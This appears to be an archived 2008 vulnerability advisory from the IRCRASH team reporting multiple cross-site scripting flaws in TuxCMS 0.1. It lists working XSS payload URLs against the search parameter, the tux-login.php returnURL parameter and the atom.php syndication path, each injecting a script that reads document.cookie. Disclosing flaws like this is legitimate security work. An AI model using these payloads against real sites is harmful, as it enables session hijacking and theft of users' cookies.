Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

[ GLSA 200805-04 ] eGroupWare: Multiple vulnerabilities

ezContents CMS Version 2.0.0  SQL Injection Vulnerabilities

[SECURITY] [DSA 1554-2] New roundup packages fix regression

mvnForum 1.1 Cross Site Scripting

From:	hadikiamarsi_(at)_hotmail.com <hadikiamarsi_(at)_hotmail.com>
Date:	08.05.2008
Subject:	Multiple XSS In TuxCMS All Version

Author : Hadi Kiamarsi
-------------------------------------------
Discovered by : Hadi Kiamarsi
-------------------------------------------
Exploited By : Hadi Kiamarsi
-------------------------------------------
E-Mail : hadikiamarsi[at]hotmail.com
-------------------------------------------
WebSite : http://ircrash.com
-------------------------------------------
Our Team : ircrash
-------------------------------------------
IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr
-------------------------------------------

CMS: tuxcms-0.1 CMS ( All Version Vulnerable )
Download CMS : http://dfn.dl.sourceforge.net/sourceforge/tuxcms/tuxcms-0.1.tar.bz2

-------------------------------------------

                           XSS
Exploit :

query : http://localhost/?q=>"><script>alert(document.
cookie)</script>
query : http://localhost/tux-login.
php?returnURL=>"><script>alert(document.
cookie)</script>
query : http://localhost/tux-login.
php?returnURL=%00""><script>alert(document.
cookie)</script>

-------------------------------------------
                           Cross Site URI

query : http://localhost/tux-syndication/atom.
php/>"><ScRiPt>alert(document.cookie)</ScRiPt>

-------------------------------------------